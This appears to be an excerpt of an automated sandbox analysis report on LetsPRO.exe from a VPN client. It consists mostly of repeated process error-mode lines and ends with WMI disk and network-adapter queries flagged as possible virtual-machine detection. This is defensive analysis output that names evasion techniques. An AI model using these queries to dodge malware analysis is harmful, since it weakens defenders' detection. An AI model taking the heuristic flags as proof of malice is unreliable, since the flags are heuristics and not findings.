              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #1&quot;} where resultclass = Win32_DiskDrive
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Dependent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #1\&quot;&quot;
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #1&quot;} where resultclass = Win32_DiskDrive
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Dependent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #1\&quot;&quot;
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
              Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_NetworkAdapter where ServiceName=&quot;tap0901&quot;
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_NetworkAdapter where GUID=&quot;{EF9D9576-0BA6-485B-A9BA-E5D5D7189092}&quot;
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::PutInstance - root\cimv2 : Win32_NetworkAdapter.DeviceID=&quot;10&quot;
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select MACAddress From Win32_NetworkAdapter WHERE ((MACAddress Is Not NULL) AND (Manufacturer &lt;&gt; &apos;Microsoft&apos;))
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_NetworkAdapter where ServiceName=&quot;tap0901&quot;
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_NetworkAdapterConfiguration where SettingID=&quot;{EF9D9576-0BA6-485B-A9BA-E5D5D7189092}&quot;
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_NetworkAdapterConfiguration.Index=10::EnableStatic
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_networkadapterconfiguration where ServiceName = &apos;tap0901&apos;
